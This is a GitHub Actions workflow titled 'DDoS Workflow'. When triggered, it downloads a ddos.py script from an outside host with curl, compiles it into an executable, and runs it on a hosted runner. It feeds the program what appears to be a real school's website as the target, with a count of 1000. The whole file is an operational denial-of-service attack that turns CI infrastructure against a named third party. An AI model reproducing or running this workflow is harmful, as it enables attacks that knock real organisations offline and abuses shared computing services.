name: DDoS Workflow

on:
  push:
    branches:
      - main
  workflow_dispatch:

jobs:
  run_ddos:
    runs-on: windows-latest

    steps:
    - name: Download ddos.py
      run: |
        mkdir ddos
        cd ddos
        curl -O https://oblakocornet.pythonanywhere.com/download/files/ddos.py

    - name: Install requests
      run: |
        pip install requests

    - name: Install pyinstaller
      run: |
        pip install pyinstaller

    - name: Build ddos.exe
      run: |
        cd ddos
        pyinstaller ddos.py -F

    - name: Run ddos.exe
      run: |
        cd ddos\dist
        $process = Start-Process -FilePath .\ddos.exe -PassThru -RedirectStandardOutput output.txt

        # Wait for ddos.exe to start
        Start-Sleep -Seconds 5

        # Send "http://corasino.kesug.com" and Enter to ddos.exe
        Add-Type -AssemblyName System.Windows.Forms
        [System.Windows.Forms.SendKeys]::SendWait("http://tegschool.edu.tomsk.ru{ENTER}")

        # Wait for some time
        Start-Sleep -Seconds 10

        # Send "500" and Enter to ddos.exe
        [System.Windows.Forms.SendKeys]::SendWait("1000{ENTER}")

        # Wait for ddos.exe to finish
        $process.WaitForExit()

        # Print the output
        Get-Content output.txt
